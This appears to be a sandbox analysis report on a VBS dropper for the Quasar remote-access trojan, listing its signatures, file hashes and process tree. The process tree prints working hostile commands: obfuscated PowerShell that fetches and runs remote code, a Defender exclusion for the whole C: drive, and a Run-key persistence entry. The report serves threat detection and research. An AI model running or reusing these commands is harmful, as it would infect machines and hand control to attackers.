Analysis

  • max time kernel
    93s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-01-2025 04:36

General

  • Target

    ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4.vbs

  • Size

    273KB

  • MD5

    d3a2ad6fb6dab0fa9dc4372edd2e2c36

  • SHA1

    01e30df2eed8f6945c8705e1289f1a5fb874f9ad

  • SHA256

    ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4

  • SHA512

    c698631d9d5c76b4e6d99a22d3057f0c030865098ab156eff7070c672230af0718dc970542cc96d31defe23ce1aa5b6ef4b42c41d2f1f60ee4ec10a54b9543a6

  • SSDEEP

    6144:uvpZGWTfNhok1a5w8PQAb4zfn2Lhi0XmQU8o:4pEYlM5w84icSh5Xm7

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4788
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1036
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ure4x1iz\ure4x1iz.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1972
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB093.tmp" "c:\Users\Admin\AppData\Local\Temp\ure4x1iz\CSC64EBB0E28DB486A834F8A2C8FFCC5D.TMP"
              6⤵
                PID:3132
            • C:\windows\system32\cmstp.exe
              "C:\windows\system32\cmstp.exe" /au C:\windows\temp\arebv43w.inf
              5⤵
                PID:1052
            • C:\Windows\system32\reg.exe
              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
              4⤵
              • Adds Run key to start application
              PID:2516
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gcWNqeWdpZG1ma2ptc2pudmZ6ZmRhcGxwZ2p3YmJubm9kdGVyYnRoaCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3gxd0YxZndiMlhia0N0SEgyd0NaR1FnY3UyZDB2ZVFlYUNVZzJsV2RlYTg9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCc3UEo3ZkNYVnltb3F2VDFhOFdpSFRBPT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGdyeGhrZXBneXBnbmhld2JxdHJ3bGNrc3h1anpld3Rscnh3anNkZmMoJHBhcmFtX3Zhcil7CUlFWCAnJHRxY21oemh6d2RhaGNsdmRnZWtxdnFjY3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckdXZraG5qbW9vZHZheWt4bmtkYXZsaWdjcz1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGNudHBnZG56cG1ld3JpdW90b2lhZGl1bWM9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkdHFjbWh6aHp3ZGFoY2x2ZGdla3F2cWNjdywgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkY250cGdkbnpwbWV3cml1b3RvaWFkaXVtYy5Db3B5VG8oJHV2a2huam1vb2R2YXlreG5rZGF2bGlnY3MpOwkkY250cGdkbnpwbWV3cml1b3RvaWFkaXVtYy5EaXNwb3NlKCk7CSR0cWNtaHpoendkYWhjbHZkZ2VrcXZxY2N3LkRpc3Bvc2UoKTsJJHV2a2huam1vb2R2YXlreG5rZGF2bGlnY3MuRGlzcG9zZSgpOwkkdXZraG5qbW9vZHZheWt4bmtkYXZsaWdjcy5Ub0FycmF5KCk7fWZ1bmN0aW9uIGRyZWt5c21ubXl6YmxxdnVscm5wa2Rjc3VyaXBtbGxtbWh4KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbG1iaGttcGlvbHdzemh6aGFpeXRxc3VmZ3N1eWNwdXNobXZxbXNmej1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJG9vZHh5dnRnaXNkenZzbXNzdmFyc3FnenFkbG5sanZpZHllYnB4aGx6b3FqbXV4cHpkPSRsbWJoa21waW9sd3N6aHpoYWl5dHFzdWZnc3V5Y3B1c2htdnFtc2Z6LkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJG9vZHh5dnRnaXNkenZzbXNzdmFyc3FnenFkbG5sanZpZHllYnB4aGx6b3FqbXV4cHpkLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kbnljcHNkcWZmd3VsdnJib29kdmZ4cWdjbyA9ICRlbnY6VVNFUk5BTUU7JHZramx1dmR1a2NyZnV1enhqeXRna2tjbXkgPSAnQzpcVXNlcnNcJyArICRueWNwc2RxZmZ3dWx2cmJvb2R2ZnhxZ2NvICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmtqbHV2ZHVrY3JmdXV6eGp5dGdra2NteTskYXFmenU9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCR2a2psdXZkdWtjcmZ1dXp4anl0Z2trY215KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkZnl1IGluICRhcWZ6dSkgewlpZiAoJGZ5dS5TdGFydHNXaXRoKCc6OicpKQl7CQkkbGh4bXQ9JGZ5dS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kY2lsaWJ6eXN4anFvd3ZtYmdzb2FzcmJkZXR6b21nZ3BqaWo9W3N0cmluZ1tdXSRsaHhtdC5TcGxpdCgnXCcpO0lFWCAnJGJ6ZGxrdmV6aGltbGFncWd5aXBta2doZWh6a2dxZGJmb21sPWdyeGhrZXBneXBnbmhld2JxdHJ3bGNrc3h1anpld3Rscnh3anNkZmMgKHFjanlnaWRtZmtqbXNqbnZmemZkYXBscGdqd2Jibm5vZHRlcmJ0aGggKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkY2lsaWJ6eXN4anFvd3ZtYmdzb2FzcmJkZXR6b21nZ3BqaWpbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckY2NnZGZvcnV1cml6aXZhaGh0d3l2cnpla2x4amVoZ3hudm89Z3J4aGtlcGd5cGduaGV3YnF0cndsY2tzeHVqemV3dGxyeHdqc2RmYyAocWNqeWdpZG1ma2ptc2pudmZ6ZmRhcGxwZ2p3YmJubm9kdGVyYnRoaCAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRjaWxpYnp5c3hqcW93dm1iZ3NvYXNyYmRldHpvbWdncGppalsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtkcmVreXNtbm15emJscXZ1bHJucGtkY3N1cmlwbWxsbW1oeCAkYnpkbGt2ZXpoaW1sYWdxZ3lpcG1rZ2hlaHprZ3FkYmZvbWwgJG51bGw7ZHJla3lzbW5teXpibHF2dWxybnBrZGNzdXJpcG1sbG1taHggJGNjZ2Rmb3J1dXJpeml2YWhodHd5dnJ6ZWtseGplaGd4bnZvICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3320
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1788
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3724

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        855B

        MD5

        edd2dbe217449efdef8d69f8aaba4d78

        SHA1

        661c16851dcf8d9f0ac1dfff01b9bea09e7b8460

        SHA256

        79385e7a6aae35d5a065c28dc01afced3d707086f67a9f4b18f3690eed15bbee

        SHA512

        4086f1692b7bfe297c66cb00ad92839f8000bdb6dcdc4fd44bc13119455038b0f99ca0b6a23f899ebbcc0a953fc8f2ef03c2fc721908edf3276e5028e4a03c50

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        4f87a8a31cd965f514ab826e94a10bea

        SHA1

        4f26f8362309bc0e5b7f951043c7092414ea6142

        SHA256

        01a123987d096e8de60e44dd60263fc539979d63583a3bac29402c49ae0889d3

        SHA512

        38e627384997ad3860bf06d70213e13c62e47d06e46a5f74b2923e7ef03980421ee6112940d3a54f7ccd19c00458b5c7b2fe1ce7763b942d0933a1545ef78699

      • C:\Users\Admin\AppData\Local\Temp\RESB093.tmp

        Filesize

        1KB

        MD5

        c8ca020df7a8095d5f9d17475302b46e

        SHA1

        f595310dec81cbda53409df0af05a70d47797248

        SHA256

        0a6df50c50bb32b445f5dfbf9a16e14a9b4b8adaeb640bb1e92b7ee1c74f3843

        SHA512

        10c6ae47af0a91b2cc84eb4d232ace62f22329c69fffcf73e305fc559cf30778c7d4e6f5d8e7d3277eb04685453767f02158c44a01cdf9f3849f5f5d2d358602

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rzxqwixp.g2a.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\c.bat

        Filesize

        265KB

        MD5

        6e899645463d001464d3b7d1ffe224fa

        SHA1

        04d16d1d22358ec0f5100855cf7a105096c8beb3

        SHA256

        80226cfbbd380486029f9f2b06af35c1b7ae4efabe32eaf653ad4e846eeab7fb

        SHA512

        e0b29154049fcfc760d42dc31857d66a2e460c3e882cfd5341aeea8c975d3e1fb91d02744e313aa844695b8900cc821d2f8ce06afd8326df06719152072b526e

      • C:\Users\Admin\AppData\Local\Temp\ure4x1iz\ure4x1iz.dll

        Filesize

        4KB

        MD5

        28a3cf927f613dbc01375975186ed659

        SHA1

        1763f1fa5498f8601ff8767fabfcf3733e27d2ce

        SHA256

        5245404f6f7fb3810da506fa24c46eb35c7d8d93b9aa04679f8e14c6f309acbc

        SHA512

        c8f7351b75234f4c89e7625fdad327a198173ea71839a61c0de69e9e239484d4b528db4c00be724d446e8e1bb12a018667e3563bdf684f3e91c8bdde74fa7106

      • C:\windows\temp\arebv43w.inf

        Filesize

        667B

        MD5

        05662b83ff7db6317e391454787598d8

        SHA1

        d290d661e282eb757a5292fe5ee8f2f8517232ab

        SHA256

        0322b78214d9fb1d40d9bf162a44f9a5fe13fcb21c96b8b0f0e289e939a9fa5c

        SHA512

        f1b302c58804c79e350cd2f30a2f08f762551cc8790ed3f0b877efd8915996587734afe9f0b4185cfbbcf589aa9b04762dd80d9d8141a5bf647de692299161e9

      • \??\c:\Users\Admin\AppData\Local\Temp\ure4x1iz\CSC64EBB0E28DB486A834F8A2C8FFCC5D.TMP

        Filesize

        652B

        MD5

        b78e0a48867451e86de27a263688412c

        SHA1

        b78373e1fbe47884b53d1a24376011a5ab03bdcc

        SHA256

        a0aa8fd00145fc2a86bbe0a5858c3f50c2163b5844d7909ab7aa01eefcefe296

        SHA512

        15f99103ce7f2e7388e8e48420c359a2326b41e37101b981dda2ffe73d2d113b4bd3316c54e08c7f44b1871ce7ef95fca2ac242ca178961a52ea7ffc5d5a5c5a

      • \??\c:\Users\Admin\AppData\Local\Temp\ure4x1iz\ure4x1iz.0.cs

        Filesize

        2KB

        MD5

        b126ac3da39ffa35cb857267cbc70cbb

        SHA1

        59dbfa9af3f2fa2c3bda0118ef779c0238675721

        SHA256

        6e6dd39153a84b94b4f309a4c4521260cbdd8a6922ade46096f42da39bc20b93

        SHA512

        c15d8ef56529792b983d55736c283ad6ae5c95bcd661053292f95c51f535109e4c59cf391e1c724be97e52ee4bfa213a380021f51c4e576201c03cfc4647acbc

      • \??\c:\Users\Admin\AppData\Local\Temp\ure4x1iz\ure4x1iz.cmdline

        Filesize

        369B

        MD5

        3c400d4a1e5bdf2d802320956a35c10a

        SHA1

        991fa82fb1a840be5c9518a46263fa7ae15ab3d3

        SHA256

        20a457e442091ef0d83870c1aab9ca8bd8ae7bb47fec61f1200240bea573fa7f

        SHA512

        7f976500479409bc79466ff5f338c4b3b10252bdd34ae96ff59189352ac4eb26198f1d69f361de4f423b87dab007fd49acf5e39becc067a17cf912e5cdf65d70

      • memory/1036-16-0x00007FFD8E2B0000-0x00007FFD8ED71000-memory.dmp

        Filesize

        10.8MB

      • memory/1036-32-0x000001C682B80000-0x000001C682B88000-memory.dmp

        Filesize

        32KB

      • memory/1036-19-0x000001C6FEA80000-0x000001C6FEA9C000-memory.dmp

        Filesize

        112KB

      • memory/1036-17-0x000001C6FF3D0000-0x000001C6FFB76000-memory.dmp

        Filesize

        7.6MB

      • memory/1036-49-0x00007FFD8E2B3000-0x00007FFD8E2B5000-memory.dmp

        Filesize

        8KB

      • memory/1036-50-0x00007FFD8E2B0000-0x00007FFD8ED71000-memory.dmp

        Filesize

        10.8MB

      • memory/1036-15-0x00007FFD8E2B0000-0x00007FFD8ED71000-memory.dmp

        Filesize

        10.8MB

      • memory/1036-5-0x000001C6FEA50000-0x000001C6FEA72000-memory.dmp

        Filesize

        136KB

      • memory/1036-54-0x00007FFD8E2B0000-0x00007FFD8ED71000-memory.dmp

        Filesize

        10.8MB

      • memory/1036-4-0x00007FFD8E2B3000-0x00007FFD8E2B5000-memory.dmp

        Filesize

        8KB

      • memory/3320-61-0x00000000050B0000-0x0000000005116000-memory.dmp

        Filesize

        408KB

      • memory/3320-91-0x00000000075C0000-0x00000000075CA000-memory.dmp

        Filesize

        40KB

      • memory/3320-60-0x0000000004FD0000-0x0000000005036000-memory.dmp

        Filesize

        408KB

      • memory/3320-58-0x0000000005120000-0x0000000005748000-memory.dmp

        Filesize

        6.2MB

      • memory/3320-71-0x00000000057D0000-0x0000000005B24000-memory.dmp

        Filesize

        3.3MB

      • memory/3320-57-0x0000000002930000-0x0000000002966000-memory.dmp

        Filesize

        216KB

      • memory/3320-73-0x0000000005D10000-0x0000000005D2E000-memory.dmp

        Filesize

        120KB

      • memory/3320-74-0x0000000005D50000-0x0000000005D9C000-memory.dmp

        Filesize

        304KB

      • memory/3320-75-0x0000000007640000-0x0000000007CBA000-memory.dmp

        Filesize

        6.5MB

      • memory/3320-76-0x0000000006DE0000-0x0000000006DFA000-memory.dmp

        Filesize

        104KB

      • memory/3320-77-0x0000000007450000-0x0000000007482000-memory.dmp

        Filesize

        200KB

      • memory/3320-78-0x0000000070AF0000-0x0000000070B3C000-memory.dmp

        Filesize

        304KB

      • memory/3320-79-0x0000000070CA0000-0x0000000070FF4000-memory.dmp

        Filesize

        3.3MB

      • memory/3320-89-0x0000000007490000-0x00000000074AE000-memory.dmp

        Filesize

        120KB

      • memory/3320-90-0x00000000074C0000-0x0000000007563000-memory.dmp

        Filesize

        652KB

      • memory/3320-59-0x0000000004F20000-0x0000000004F42000-memory.dmp

        Filesize

        136KB

      • memory/3320-92-0x0000000007D60000-0x0000000007DF6000-memory.dmp

        Filesize

        600KB

      • memory/3320-93-0x00000000075D0000-0x00000000075E1000-memory.dmp

        Filesize

        68KB

      • memory/3320-94-0x0000000007600000-0x000000000760E000-memory.dmp

        Filesize

        56KB

      • memory/3320-95-0x0000000007620000-0x0000000007634000-memory.dmp

        Filesize

        80KB

      • memory/3320-96-0x0000000007CF0000-0x0000000007D0A000-memory.dmp

        Filesize

        104KB

      • memory/3320-97-0x0000000007CE0000-0x0000000007CE8000-memory.dmp

        Filesize

        32KB

      • memory/3320-99-0x00000000073E0000-0x00000000073E8000-memory.dmp

        Filesize

        32KB

      • memory/3320-100-0x0000000007CD0000-0x0000000007D04000-memory.dmp

        Filesize

        208KB

      • memory/3320-101-0x0000000007D00000-0x0000000007D5E000-memory.dmp

        Filesize

        376KB

      • memory/3320-102-0x00000000083B0000-0x0000000008954000-memory.dmp

        Filesize

        5.6MB

      • memory/3320-103-0x0000000007EE0000-0x0000000007F72000-memory.dmp

        Filesize

        584KB

      • memory/3320-104-0x0000000008A90000-0x0000000008AA2000-memory.dmp

        Filesize

        72KB

      • memory/3320-105-0x0000000008AF0000-0x0000000008B2C000-memory.dmp

        Filesize

        240KB

      • memory/3320-107-0x0000000004CB0000-0x0000000004CBA000-memory.dmp

        Filesize

        40KB